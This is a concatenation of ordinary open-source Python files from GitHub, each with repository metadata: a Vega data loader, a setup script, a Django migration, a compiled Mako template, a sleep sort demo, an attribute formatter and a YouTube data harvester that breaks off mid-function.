"""Load values from a pandas ``Series`` or ``DataFrame`` object
Parameters
----------
data : pandas ``Series`` or ``DataFrame``
Pandas object to import data from.
columns: list, default None
DataFrame columns to convert to Data. Keys default to col names.
If columns are given and on_index is False, x-axis data will
default to the first column.
key_on: string, default 'idx'
Value to key on for x-axis data. Defaults to the index.
name : string, default None
Applies to the ``name`` attribute of the generated class. If
``None`` (default), then the ``name`` attribute of ``pd_obj`` is
used if it exists, or ``'table'`` if it doesn't.
series_key : string, default 'data'
Applies only to ``Series``. Used as the column key when the Series has
no ``name``; a named Series uses its own name instead. For example, if
``series_key`` is ``'x'`` and the Series is unnamed, the entries of the
``values`` list will be ``{'idx': ..., 'col': 'x', 'val': ...}``.
grouped: boolean, default False
Pass true for an extra grouping parameter
records: boolean, default False
Requires Pandas 0.12 or greater. Writes the Pandas DataFrame
using the df.to_json(orient='records') formatting.
**kwargs : dict
Additional arguments passed to the :class:`Data` constructor.
"""
# Note: There's an experimental JSON encoder floating around in
# pandas land that hasn't made it into the main branch. This
# function should be revisited if it ever does.
if not pd:
raise LoadError('pandas could not be imported')
if not hasattr(data, 'index'):
raise ValueError('Please load a Pandas object.')
if name:
vega_data = cls(name=name, **kwargs)
else:
vega_data = cls(name='table', **kwargs)
pd_obj = data.copy()
if columns:
pd_obj = data[columns]
if key_on != 'idx':
pd_obj.index = data[key_on]
if records:
#The worst
vega_data.values = json.loads(pd_obj.to_json(orient='records'))
return vega_data
vega_data.values = []
if isinstance(pd_obj, pd.Series):
data_key = data.name or series_key
for i, v in pd_obj.iterkv():
value = {}
value['idx'] = cls.serialize(i)
value['col'] = data_key
value['val'] = cls.serialize(v)
vega_data.values.append(value)
elif isinstance(pd_obj, pd.DataFrame):
# We have to explicitly convert the column names to strings
# because the json serializer doesn't allow for integer keys.
for i, row in pd_obj.iterrows():
for num, (k, v) in enumerate(row.iterkv()):
value = {}
value['idx'] = cls.serialize(i)
value['col'] = cls.serialize(k)
value['val'] = cls.serialize(v)
if grouped:
value['group'] = num
vega_data.values.append(value)
else:
raise ValueError('cannot load from data type '
+ type(pd_obj).__name__)
return vega_data
@classmethod
def from_numpy(cls, np_obj, name, columns, index=None, index_key=None,
**kwargs):
"""Load values from a numpy array
Parameters
----------
np_obj : numpy.ndarray
numpy array to load data from
name : string
``name`` field for the data
columns : iterable
Sequence of column names, from left to right. Must have same
length as the number of columns of ``np_obj``.
index : iterable, default None
Sequence of indices from top to bottom. If ``None`` (default),
then the indices are integers starting at 0. Must have same
length as the number of rows of ``np_obj``.
index_key : string, default None
Key to use for the index. If ``None`` (default), ``idx`` is
used.
**kwargs : dict
Additional arguments passed to the :class:`Data` constructor
Notes
-----
The individual elements of ``np_obj``, ``columns``, and ``index``
must return valid values from :func:`Data.serialize`.
"""
if not np:
raise LoadError('numpy could not be imported')
_assert_is_type('numpy object', np_obj, np.ndarray)
# Integer index if none is provided
index = index or range(np_obj.shape[0])
# Explicitly map dict-keys to strings for JSON serializer.
columns = list(map(str, columns))
index_key = index_key or cls._default_index_key
if len(index) != np_obj.shape[0]:
raise LoadError(
'length of index must be equal to number of rows of array')
elif len(columns) != np_obj.shape[1]:
raise LoadError(
'length of columns must be equal to number of columns of '
'array')
data = cls(name=name, **kwargs)
data.values = [
dict([(index_key, cls.serialize(idx))] +
[(col, x) for col, x in zip(columns, row)])
for idx, row in zip(index, np_obj.tolist())]
return data
@classmethod
def from_mult_iters(cls, name=None, idx=None, **kwargs):
"""Load values from multiple iters
Parameters
----------
name : string, default None
Name of the data set. If None (default), the name will be set to
``'table'``.
idx: string, default None
Iterable to use for the data index
**kwargs : dict of iterables
The ``values`` field will contain dictionaries with keys for
each of the iterables provided. For example,
d = Data.from_mult_iters(idx='x', x=[0, 1, 5], y=(10, 20, 30))
would result in ``d`` having a ``values`` field with
[{'idx': 0, 'col': 'y', 'val': 10},
{'idx': 1, 'col': 'y', 'val': 20}, {'idx': 5, 'col': 'y', 'val': 30}]
If the iterables are not the same length, then ValueError is
raised.
"""
if not name:
name = 'table'
lengths = [len(v) for v in kwargs.values()]
if len(set(lengths)) != 1:
raise ValueError('Iterables must all be same length')
if not idx:
raise ValueError('Must provide iter name index reference')
index = kwargs.pop(idx)
vega_vals = []
for k, v in sorted(kwargs.items()):
for idx, val in zip(index, v):
value = {}
value['idx'] = idx
value['col'] = k
value['val'] = val
vega_vals.append(value)
return cls(name, values=vega_vals)
@classmethod
def from_iter(cls, data, name=None):
"""Convenience method for loading data from an iterable.
Defaults to numerical indexing for x-axis.
Parameters
----------
data: iterable
An iterable of data (list, tuple, dict of key/val pairs)
name: string, default None
Name of the data set. If None (default), the name will be set to
``'table'``.
"""
if not name:
name = 'table'
if isinstance(data, (list, tuple)):
data = {x: y for x, y in enumerate(data)}
values = [{'idx': k, 'col': 'data', 'val': v}
for k, v in sorted(data.items())]
return cls(name, values=values)
@classmethod
def keypairs(cls, data, columns=None, use_index=False, name=None):
"""This will format the data as Key: Value pairs, rather than the
idx/col/val style. This is useful for some transforms, and to
key choropleth map data
Standard Data Types:
List: [0, 10, 20, 30, 40]
Paired Tuples: ((0, 1), (0, 2), (0, 3))
Dict: {'A': 10, 'B': 20, 'C': 30, 'D': 40, 'E': 50}
Plus Pandas DataFrame and Series, and Numpy ndarray
Parameters
----------
data:
List, Tuple, Dict, Pandas Series/DataFrame, Numpy ndarray
columns: list, default None
If passing Pandas DataFrame, you must pass at least one column
name. If one column is passed, x-values will default to the index
values. If two column names are passed, x-values are columns[0],
y-values columns[1].
use_index: boolean, default False
Use the DataFrame index for your x-values
"""
if not name:
name = 'table'
cls.raw_data = data
#Tuples
if isinstance(data, tuple):
values = [{"x": x[0], "y": x[1]} for x in data]
#Lists
elif isinstance(data, list):
values = [{"x": x, "y": y}
for x, y in zip(range(len(data) + 1), data)]
#Dicts
elif isinstance(data, dict) or isinstance(data, pd.Series):
values = [{"x": x, "y": y} for x, y in sorted(data.items())]
#Dataframes
elif isinstance(data, pd.DataFrame):
if len(columns) > 1 and use_index:
raise ValueError('If using index as x-axis, len(columns)'
'cannot be > 1')
if use_index or len(columns) == 1:
values = [{"x": cls.serialize(x[0]),
"y": cls.serialize(x[1][columns[0]])}
for x in data.iterrows()]
else:
values = [{"x": cls.serialize(x[1][columns[0]]),
"y": cls.serialize(x[1][columns[1]])}
for x in data.iterrows()]
#NumPy arrays
elif isinstance(data, np.ndarray):
values = cls._numpy_to_values(data)
else:
raise TypeError('unknown data type %s' % type(data))
return cls(name, values=values)
@staticmethod
def _numpy_to_values(data):
'''Convert a NumPy array to values attribute'''
def to_list_no_index(xvals, yvals):
return [{"x": x, "y": np.asscalar(y)}
for x, y in zip(xvals, yvals)]
if len(data.shape) == 1 or data.shape[1] == 1:
xvals = range(data.shape[0] + 1)
values = to_list_no_index(xvals, data)
elif len(data.shape) == 2:
if data.shape[1] == 2:
# NumPy arrays and matrices have different iteration rules.
if isinstance(data, np.matrix):
xidx = (0, 0)
yidx = (0, 1)
else:
xidx = 0
yidx = 1
xvals = [np.asscalar(row[xidx]) for row in data]
yvals = [np.asscalar(row[yidx]) for row in data]
values = [{"x": x, "y": y} for x, y in zip(xvals, yvals)]
else:
raise ValueError('arrays with > 2 columns not supported')
else:
raise ValueError('invalid dimensions for ndarray')
return values
def to_json(self, validate=False, pretty_print=True, data_path=None):
"""Convert data to JSON
Parameters
----------
data_path : string
If not None, then data is written to a separate file at the
specified path. Note that the ``url`` attribute if the data must
be set independently for the data to load correctly.
Returns
-------
string
Valid Vega JSON.
"""
#TODO: support writing to separate file
return super(self.__class__, self).to_json(validate=validate,
pretty_print=pretty_print)
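# Illustrative usage sketch (added for clarity, not part of the original module):
# building a small Data set from a plain Python iterable, without pandas or numpy.
def _example_data_from_iter():
    d = Data.from_iter([10, 20, 30], name='example')
    # rows look like {'idx': 0, 'col': 'data', 'val': 10}
    return d.to_json()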
|
{
"content_hash": "9e7bba493ac3b58d53ef23c42611c4b2",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 79,
"avg_line_length": 35.33472803347281,
"alnum_prop": 0.5413854351687389,
"repo_name": "myusuf3/vincent",
"id": "cd8593950890f9688756611dd2fda3ddffaa3d31",
"size": "16914",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "vincent/data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12395"
},
{
"name": "JavaScript",
"bytes": "49697"
},
{
"name": "Python",
"bytes": "188816"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
setup(name='hyde',
version='0.4',
description='static site generator',
packages=find_packages(),
install_requires=(
'django',
'pyYAML',
'markdown2',
'pygments',
'pyrss2gen',
),
)
|
{
"content_hash": "c7d24bf3b2d99ca200412b6703eb0492",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 43,
"avg_line_length": 21.714285714285715,
"alnum_prop": 0.5328947368421053,
"repo_name": "sjl/hyde",
"id": "1e94f2249fac5ca13d4d481efc0127946c9c22f6",
"size": "304",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Emacs Lisp",
"bytes": "349"
},
{
"name": "JavaScript",
"bytes": "92190"
},
{
"name": "Python",
"bytes": "295259"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dictionary', '0015_auto_20171120_1211'),
]
operations = [
migrations.CreateModel(
name='AnnotationIdglossTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(help_text='\n This is the name of a sign used by annotators when glossing the corpus in\n an ELAN annotation file.', max_length=30, verbose_name='Annotation ID Gloss')),
],
),
migrations.AddField(
model_name='annotationidglosstranslation',
name='gloss',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dictionary.Gloss'),
),
migrations.AddField(
model_name='annotationidglosstranslation',
name='language',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dictionary.Language'),
),
migrations.AlterUniqueTogether(
name='annotationidglosstranslation',
unique_together=set([('gloss', 'language')]),
),
]
|
{
"content_hash": "59fa047ef8fa25d63e9f2c836eb867d6",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 225,
"avg_line_length": 38.457142857142856,
"alnum_prop": 0.6181277860326895,
"repo_name": "Signbank/NGT-signbank",
"id": "1cb3bfae94e2b1fee8c1dccc3a8762c7b832bac8",
"size": "1417",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "signbank/dictionary/migrations/0016_auto_20171123_1654.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "441343"
},
{
"name": "HTML",
"bytes": "401393"
},
{
"name": "JavaScript",
"bytes": "737137"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Python",
"bytes": "818708"
}
],
"symlink_target": ""
}
|
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 9
_modified_time = 1382819994.53595
_enable_loop = True
_template_filename = u'/home/ali/BLOG/VENV/local/lib/python2.7/site-packages/nikola/data/themes/base/templates/base_helper.tmpl'
_template_uri = u'base_helper.tmpl'
_source_encoding = 'utf-8'
_exports = ['html_head', 'html_translations', 'html_navigation_links', 'html_social', 'late_load_js', 'html_sidebar_links']
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
# SOURCE LINE 46
__M_writer(u'\n\n')
# SOURCE LINE 49
__M_writer(u'\n\n')
# SOURCE LINE 53
__M_writer(u'\n\n<!--FIXME: remove in v7 -->\n')
# SOURCE LINE 58
__M_writer(u'\n\n')
# SOURCE LINE 81
__M_writer(u'\n\n\n')
# SOURCE LINE 90
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_head(context):
__M_caller = context.caller_stack._push_frame()
try:
favicons = context.get('favicons', UNDEFINED)
description = context.get('description', UNDEFINED)
title = context.get('title', UNDEFINED)
use_cdn = context.get('use_cdn', UNDEFINED)
translations = context.get('translations', UNDEFINED)
blog_author = context.get('blog_author', UNDEFINED)
_link = context.get('_link', UNDEFINED)
rss_link = context.get('rss_link', UNDEFINED)
striphtml = context.get('striphtml', UNDEFINED)
comment_system_id = context.get('comment_system_id', UNDEFINED)
has_custom_css = context.get('has_custom_css', UNDEFINED)
mathjax_config = context.get('mathjax_config', UNDEFINED)
len = context.get('len', UNDEFINED)
comment_system = context.get('comment_system', UNDEFINED)
use_bundles = context.get('use_bundles', UNDEFINED)
blog_title = context.get('blog_title', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 2
__M_writer(u'\n <meta charset="utf-8">\n')
# SOURCE LINE 4
if description:
# SOURCE LINE 5
__M_writer(u' <meta name="description" content="')
__M_writer(unicode(description))
__M_writer(u'">\n')
# SOURCE LINE 7
__M_writer(u' <meta name="author" content="')
__M_writer(unicode(blog_author))
__M_writer(u'">\n <title>')
# SOURCE LINE 8
__M_writer(striphtml(unicode(title)))
__M_writer(u' | ')
__M_writer(striphtml(unicode(blog_title)))
__M_writer(u'</title>\n ')
# SOURCE LINE 9
__M_writer(unicode(mathjax_config))
__M_writer(u'\n')
# SOURCE LINE 10
if use_bundles:
# SOURCE LINE 11
if use_cdn:
# SOURCE LINE 12
__M_writer(u' <link href="/assets/css/all.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 13
else:
# SOURCE LINE 14
__M_writer(u' <link href="/assets/css/all-nocdn.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 16
else:
# SOURCE LINE 17
__M_writer(u' <link href="/assets/css/rst.css" rel="stylesheet" type="text/css">\n <link href="/assets/css/code.css" rel="stylesheet" type="text/css">\n <link href="/assets/css/theme.css" rel="stylesheet" type="text/css"/>\n')
# SOURCE LINE 20
if has_custom_css:
# SOURCE LINE 21
__M_writer(u' <link href="/assets/css/custom.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 24
__M_writer(u' <!--[if lt IE 9]>\n <script src="http://html5shim.googlecode.com/svn/trunk/html5.js" type="text/javascript"></script>\n <![endif]-->\n')
# SOURCE LINE 27
if rss_link:
# SOURCE LINE 28
__M_writer(u' ')
__M_writer(unicode(rss_link))
__M_writer(u'\n')
# SOURCE LINE 29
else:
# SOURCE LINE 30
if len(translations) > 1:
# SOURCE LINE 31
for language in translations:
# SOURCE LINE 32
__M_writer(u' <link rel="alternate" type="application/rss+xml" title="RSS (')
__M_writer(unicode(language))
__M_writer(u')" href="')
__M_writer(unicode(_link('rss', None, language)))
__M_writer(u'">\n')
# SOURCE LINE 34
else:
# SOURCE LINE 35
__M_writer(u' <link rel="alternate" type="application/rss+xml" title="RSS" href="')
__M_writer(unicode(_link('rss', None)))
__M_writer(u'">\n')
# SOURCE LINE 38
if favicons:
# SOURCE LINE 39
for name, file, size in favicons:
# SOURCE LINE 40
__M_writer(u' <link rel="')
__M_writer(unicode(name))
__M_writer(u'" href="')
__M_writer(unicode(file))
__M_writer(u'" sizes="')
__M_writer(unicode(size))
__M_writer(u'"/>\n')
# SOURCE LINE 43
if comment_system == 'facebook':
# SOURCE LINE 44
__M_writer(u' <meta property="fb:app_id" content="')
__M_writer(unicode(comment_system_id))
__M_writer(u'">\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_translations(context):
__M_caller = context.caller_stack._push_frame()
try:
lang = context.get('lang', UNDEFINED)
messages = context.get('messages', UNDEFINED)
translations = context.get('translations', UNDEFINED)
_link = context.get('_link', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 84
__M_writer(u'\n')
# SOURCE LINE 85
for langname in translations.keys():
# SOURCE LINE 86
if langname != lang:
# SOURCE LINE 87
__M_writer(u' <a href="')
__M_writer(unicode(_link("index", None, langname)))
__M_writer(u'">')
__M_writer(unicode(messages("LANGUAGE", langname)))
__M_writer(u'</a>\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_navigation_links(context):
__M_caller = context.caller_stack._push_frame()
try:
lang = context.get('lang', UNDEFINED)
permalink = context.get('permalink', UNDEFINED)
tuple = context.get('tuple', UNDEFINED)
navigation_links = context.get('navigation_links', UNDEFINED)
rel_link = context.get('rel_link', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 60
__M_writer(u'\n')
# SOURCE LINE 61
for url, text in navigation_links[lang]:
# SOURCE LINE 62
if isinstance(url, tuple):
# SOURCE LINE 63
__M_writer(u' <li> ')
__M_writer(unicode(text))
__M_writer(u'\n <ul>\n')
# SOURCE LINE 65
for suburl, text in url:
# SOURCE LINE 66
if rel_link(permalink, suburl) == "#":
# SOURCE LINE 67
__M_writer(u' <li class="active"><a href="')
__M_writer(unicode(suburl))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 68
else:
# SOURCE LINE 69
__M_writer(u' <li><a href="')
__M_writer(unicode(suburl))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 72
__M_writer(u' </ul>\n')
# SOURCE LINE 73
else:
# SOURCE LINE 74
if rel_link(permalink, url) == "#":
# SOURCE LINE 75
__M_writer(u' <li class="active"><a href="')
__M_writer(unicode(url))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 76
else:
# SOURCE LINE 77
__M_writer(u' <li><a href="')
__M_writer(unicode(url))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_social(context):
__M_caller = context.caller_stack._push_frame()
try:
social_buttons_code = context.get('social_buttons_code', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 51
__M_writer(u'\n\t')
# SOURCE LINE 52
__M_writer(unicode(social_buttons_code))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_late_load_js(context):
__M_caller = context.caller_stack._push_frame()
try:
__M_writer = context.writer()
# SOURCE LINE 48
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_sidebar_links(context):
__M_caller = context.caller_stack._push_frame()
try:
def html_navigation_links():
return render_html_navigation_links(context)
__M_writer = context.writer()
# SOURCE LINE 56
__M_writer(u'\n ')
# SOURCE LINE 57
__M_writer(unicode(html_navigation_links()))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
|
{
"content_hash": "7d520d6451fb0baa6194ecd712b86d29",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 259,
"avg_line_length": 38.88970588235294,
"alnum_prop": 0.4905464170920779,
"repo_name": "apjd/wwwapjd",
"id": "0599313cffbb1b35de5004a47331236d1c254b88",
"size": "10603",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cache/.mako.tmp/base_helper.tmpl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "26187"
},
{
"name": "JavaScript",
"bytes": "1650"
},
{
"name": "Python",
"bytes": "23065"
}
],
"symlink_target": ""
}
|
"""
Sleep sort is a proof-of-concept sorting algorithm: it creates one thread per
number in the input and each thread sleeps for that many seconds before
emitting its number.
It has no practical use and does not work for negative numbers. For very
close positive numbers the results are not guaranteed to be consistent.
"""
try:
import queue
except ImportError:
import Queue as queue
import threading
import time
def sleeper(number, sorted_numbers):
"""
Worker function for sleep sort's thread.
:param number: Number for the thread
:param sorted_numbers: Queue which contains the sorted numbers
"""
time.sleep(number)
sorted_numbers.put(number)
def sleep_sort(numbers, reverse=False):
"""
Sorts the numbers using sleep sort algorithm.
:param numbers: Iterable object containing numbers
    :param reverse: Whether the results should be reversed (descending order)
:returns: A generator with sorted numbers
"""
threads = []
sorted_numbers = queue.LifoQueue() if reverse else queue.Queue()
for number in numbers:
thread = threading.Thread(target=sleeper,
args=(number, sorted_numbers))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
while not sorted_numbers.empty():
yield sorted_numbers.get()
def main():
numbers = [2, 3, 4, 1]
print("Ascending order: ")
for number in sleep_sort(numbers):
print(number)
print("Descending order: ")
for number in sleep_sort(numbers, reverse=True):
print(number)
if __name__ == '__main__':
main()
|
{
"content_hash": "0ef6662d3326616878395daf35eebd27",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 75,
"avg_line_length": 28.17241379310345,
"alnum_prop": 0.6701346389228886,
"repo_name": "Enether/algos",
"id": "55c44e4d082abd9330fcb40f1effa0d21b504909",
"size": "1634",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "sleep_sort/sleep_sort.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "29004"
},
{
"name": "C#",
"bytes": "2709"
},
{
"name": "C++",
"bytes": "9335"
},
{
"name": "Go",
"bytes": "13835"
},
{
"name": "Java",
"bytes": "63193"
},
{
"name": "JavaScript",
"bytes": "22815"
},
{
"name": "Python",
"bytes": "165580"
},
{
"name": "Shell",
"bytes": "2197"
}
],
"symlink_target": ""
}
|
"""
Defines how attributes are organized and displayed.
"""
from collections import namedtuple
from collections.abc import Iterable
from itertools import groupby
from typing import List
from . import api # noqa: F401, '.api' imported but unused
from .attr_category import AttrCategory
from .configuration import attribute_color, category_color, comma, doc_color, slot_tag
def format_pattrs(pattrs: List['api.PrettyAttribute']) -> str:
"""Generates repr string given a list of pattrs."""
pattrs.sort(
key=lambda x: (
_FORMATTER[x.display_group].display_index,
x.display_group,
x.name,
)
)
output = [
_FORMATTER[display_group].formatter(display_group, grouped_pattrs)
for display_group, grouped_pattrs in groupby(pattrs, lambda x: x.display_group)
]
return '\n'.join(output)
def _format_single_line(category: AttrCategory, pattrs: Iterable) -> str:
category_line = category_color.wrap_text(str(category) + ':')
output_text = []
for pattr in pattrs:
single_attr = attribute_color.wrap_text(pattr.name)
output_text.append(single_attr + slot_tag if pattr.slotted else single_attr)
return '{0}\n {1}'.format(category_line, comma.join(output_text))
def _format_multiline_with_doc(category: AttrCategory, pattrs: Iterable) -> str:
category_line = category_color.wrap_text(str(category) + ':') + '\n'
output_text = []
for pattr in pattrs:
name = attribute_color.wrap_text(pattr.name)
if pattr.slotted:
name += slot_tag
name += attribute_color.wrap_text(': ')
doc = doc_color.wrap_text(pattr.doc)
output_text.append(' {0}{1}'.format(name, doc))
return category_line + '\n'.join(output_text)
def _format_descriptor(category: AttrCategory, attrs: Iterable) -> str:
return _format_multiline_with_doc(category, attrs)
_AttributeGroupFormatter = namedtuple(
'_AttributeGroupFormatter', ['display_index', 'formatter']
)
_single_line = _AttributeGroupFormatter(display_index=0, formatter=_format_single_line)
_descriptor = _AttributeGroupFormatter(display_index=1, formatter=_format_descriptor)
_multiline_with_doc = _AttributeGroupFormatter(
display_index=2, formatter=_format_multiline_with_doc
)
_FORMATTER = {
AttrCategory.SLOT: _single_line,
AttrCategory.FUNCTION: _multiline_with_doc,
AttrCategory.CLASS: _multiline_with_doc,
AttrCategory.EXCEPTION: _multiline_with_doc,
AttrCategory.PROPERTY: _single_line,
# Attribute
AttrCategory.MODULE_ATTRIBUTE: _single_line,
AttrCategory.SPECIAL_ATTRIBUTE: _single_line,
# Function
AttrCategory.MAGIC: _multiline_with_doc,
AttrCategory.ARITHMETIC: _single_line,
AttrCategory.ITER: _single_line,
AttrCategory.CONTEXT_MANAGER: _single_line,
AttrCategory.OBJECT_CUSTOMIZATION: _single_line,
AttrCategory.RICH_COMPARISON: _single_line,
AttrCategory.ATTRIBUTE_ACCESS: _single_line,
AttrCategory.DESCRIPTOR: _descriptor,
AttrCategory.DESCRIPTOR_CLASS: _single_line,
AttrCategory.STATIC_METHOD: _descriptor,
AttrCategory.CLASS_CUSTOMIZATION: _single_line,
AttrCategory.CONTAINER: _single_line,
AttrCategory.COROUTINE: _single_line,
AttrCategory.COPY: _single_line,
AttrCategory.PICKLE: _single_line,
AttrCategory.ABSTRACT_CLASS: _single_line,
AttrCategory.PATTERN_MATCHING: _single_line,
AttrCategory.TYPING: _single_line,
}
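# A minimal standalone sketch (not part of pdir2) of the group-then-dispatch
# pattern format_pattrs uses above: attributes are sorted by their group's
# display index, grouped with itertools.groupby, and each group is rendered by
# the formatter registered for it. The _Attr namedtuple, the group names and
# the plain-string formatters below are illustrative stand-ins, not pdir2
# APIs; the function reuses the module-level namedtuple/groupby imports.
def _example_group_and_dispatch() -> str:
    _Attr = namedtuple('_Attr', ['name', 'group'])
    display_index = {'property': 0, 'function': 1}
    formatters = {
        'property': lambda group, attrs: '{0}: {1}'.format(
            group, ', '.join(a.name for a in attrs)),
        'function': lambda group, attrs: '{0}:\n{1}'.format(
            group, '\n'.join('  ' + a.name for a in attrs)),
    }
    attrs = [_Attr('run', 'function'), _Attr('size', 'property'),
             _Attr('name', 'property')]
    attrs.sort(key=lambda a: (display_index[a.group], a.group, a.name))
    return '\n'.join(
        formatters[group](group, grouped)
        for group, grouped in groupby(attrs, lambda a: a.group)
    )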
|
{
"content_hash": "50bf974183b64990527107e6c9fd0ae8",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 87,
"avg_line_length": 36.55789473684211,
"alnum_prop": 0.7002591419522027,
"repo_name": "laike9m/pdir2",
"id": "1ba574f7befdd6cb76899d4bf3ee437a76dbfd47",
"size": "3473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pdir/format.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "537"
},
{
"name": "Python",
"bytes": "67568"
}
],
"symlink_target": ""
}
|
from datetime import timedelta
import resource
import time
import urllib
from snh.models.youtubemodel import *
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
import snhlogger
logger = snhlogger.init_logger(__name__, "youtube.log")
def run_youtube_harvester():
harvester_list = YoutubeHarvester.objects.all()
for harvester in harvester_list:
logger.info(u"The harvester %s is %s" %
(unicode(harvester),
"active" if harvester.is_active else "inactive"))
if harvester.is_active:
run_harvester_v1(harvester)
def sleeper(retry_count):
retry_delay = 1
wait_delay = retry_count*retry_delay
wait_delay = 10 if wait_delay > 10 else wait_delay
time.sleep(wait_delay)
def get_timedelta(dm_time):
ts = datetime.strptime(dm_time,'%Y-%m-%dT%H:%M:%S+0000')
return (datetime.utcnow() - ts).days
def get_existing_user(param):
user = None
try:
user = YTUser.objects.get(**param)
except MultipleObjectsReturned:
user = YTUser.objects.filter(**param)[0]
logger.warning(u"Duplicated user in DB! %s, %s" % (user, user.fid))
except ObjectDoesNotExist:
pass
return user
def update_user(harvester, userid):
snh_user = None
try:
uniuserid = urllib.urlencode({"k":userid.encode('utf-8')}).split("=")[1:][0]
ytuser = harvester.api_call("GetYouTubeUserEntry",{"username":uniuserid})
split_uri = ytuser.id.text.split("/")
fid = split_uri[len(split_uri)-1]
snh_user = get_existing_user({"fid__exact":fid})
if not snh_user:
snh_user = get_existing_user({"username__exact":userid})
if not snh_user:
snh_user = YTUser(
fid=fid,
username=userid,
)
snh_user.save()
logger.info(u"New user created in status_from_search! %s", snh_user)
snh_user.update_from_youtube(ytuser)
except gdata.service.RequestError, e:
msg = u"RequestError on user %s. Trying to update anyway" % (userid)
logger.info(msg)
if e[0]["status"] == 403 or e[0]["status"] == 400:
snh_user = get_existing_user({"username__exact":userid})
if not snh_user:
snh_user = YTUser(
username=userid,
)
snh_user.save()
logger.info(u"New user created in status_from_search! %s", snh_user)
else:
msg = u"RequestError on user %s!!! Force update failed!!!" % (userid)
logger.exception(msg)
except:
msg = u"Cannot update user %s" % (userid)
logger.exception(msg)
return snh_user
def update_users(harvester):
all_users = harvester.ytusers_to_harvest.all()
for snhuser in all_users:
if not snhuser.error_triggered:
uid = snhuser.fid if snhuser.fid else snhuser.username
update_user(harvester, uid)
else:
logger.info(u"Skipping user update: %s(%s) because user has triggered the error flag." % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"User harvest completed %s Mem:%s MB" % (harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def update_video(snhuser, ytvideo):
split_uri = ytvideo.id.text.split("/")
fid = split_uri[len(split_uri)-1]
snhvideo = None
try:
try:
snhvideo = YTVideo.objects.get(fid__exact=fid)
except ObjectDoesNotExist:
snhvideo = YTVideo(fid=fid, user=snhuser)
snhvideo.save()
snhvideo.update_from_youtube(snhuser, ytvideo)
except:
msg = u"Cannot update video %s" % (unicode(ytvideo.id.text,'UTF-8'))
logger.exception(msg)
return snhvideo
def update_comment(harvester, snhvideo, ytcomment):
author_name = ytcomment.author[0].name.text
snhuser = update_user(harvester, author_name)
split_uri = ytcomment.id.text.split("/")
fid = split_uri[len(split_uri)-1]
try:
try:
snhcomment = YTComment.objects.get(fid__exact=fid)
except ObjectDoesNotExist:
snhcomment = YTComment(fid=fid, video=snhvideo)
snhcomment.save()
snhcomment.update_from_youtube(snhvideo, snhuser, ytcomment)
except:
msg = u"Cannot update comment %s" % (unicode(ytcomment.id.text,'UTF-8'))
logger.exception(msg)
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.debug(u"Commment updated: comid:%s vidid:%s %s Mem:%s MB" % (snhcomment.fid,snhvideo.fid, harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
return snhcomment
def update_all_comment_helper(harvester, snhvideo, comment_list):
for comment in comment_list.entry:
update_comment(harvester, snhvideo, comment)
get_next_comment_uri = comment_list.GetNextLink().href if comment_list.GetNextLink() else None
return get_next_comment_uri
def update_all_comment(harvester,snhvideo):
